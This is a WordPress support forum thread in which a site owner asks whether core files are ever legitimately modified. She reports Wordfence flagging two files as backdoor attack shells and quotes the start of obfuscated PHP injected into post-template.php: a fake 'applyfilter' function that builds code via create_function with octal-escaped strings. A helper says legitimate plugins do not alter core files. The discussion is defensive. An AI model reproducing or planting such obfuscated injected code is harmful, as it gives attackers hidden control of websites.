[resolved] Core Files Modified or Added - Is this ever legitimate? (7 posts)

  1. KristenSRTS
    Posted 3 years ago #


    I believe my site has been hacked, but there's nothing obvious happening as far as I can see. I ran a scan (using the Wordfence plugin) and it found 3 issues. One is a modification to the post-template.php file; the other two are files within the core WordPress folders that are NOT part of the original installation. Before I go deleting things (I have backups, so hopefully nothing un-fixable will happen) I wanted to make sure that I'm understanding things correctly. Is there ever a time when a theme or plugins or any other "extra" WordPress thing adds to or modifies the core files legitimately?

    The files that had issues and the warnings about them are:
    wp-admin/includes/class-wp-theme-edit.php - "Appears to be an attack shell"
    wp-admin/css/options-meta.php - "Appears to be an attack shell" - both of these shells mention backdoor access
    wp-includes/post-template.php - Modified - on one line (167) there was an "applyfilter" added, then a bunch of stuff lower down (around line 686) starting with a note,
    `* Applies custom filter.
    * @since 0.71
    * $text string to apply the filter
    * @return string
    function applyfilter($text=null) {
    if($text) @ob_start();
    if(1){global $O10O1OO1O;$O10O1OO1O=create_function('$s,$k',"\44\163\75\165\162\154\144\145\143\157\144\145\50\44\"`
    and it continues on like that with bunch more numbers, etc. and some other weird looking code or something. I don't know anything about php files or really very much about any of this stuff. Any help would be appreciated.


  2. Krishna
    Posted 3 years ago #

  3. KristenSRTS
    Posted 3 years ago #

    Thank you for the links. I'm still curious about the original question, though: if the WordPress core files modified, or extra files/folders added to them in the same directories, is this ever legitimate? For example, I know plugins will go into the plugin folder. Would an extra .php file ever be legit? What about a modified one?

    If so, how do you know what's OK and what's not? I gave specifics to show what kind of stuff I was looking at, but I don't need help with having been hacked per se. More about what files might be good to delete and which could have been placed there by something else I'm using, and how to tell which is which.

  4. Krishna
    Posted 3 years ago #

    You should never modify the WordPress core files. If you do so, either your site will crash or you will be leaving security holes open through hackers get in.

    Did you go through the links I provided? They answer all your questions and more. You can have a quick glance of what to do/ look for ( though it is not everything) here:

  5. KristenSRTS
    Posted 3 years ago #

    Right. As I asked, though, I'm wondering if anything legitimate ever modifies the core files - I'm not asking if I should modify them myself, nor what to do when a site gets hacked. I'm not looking for advice, just info! :)

  6. Krishna
    Posted 3 years ago #

    Nothing modifies WordPress core, but they add more functionality. If anything like a plugin alters the core, it can make the entire setup corrupt, make the site collapse, leave security holes and create other problems. That said, rogue plugins, themes, etc. can be designed to change the core, but they are discouraged and not advisable to use.

  7. KristenSRTS
    Posted 3 years ago #


Topic Closed

This topic has been closed to new replies.

About this Topic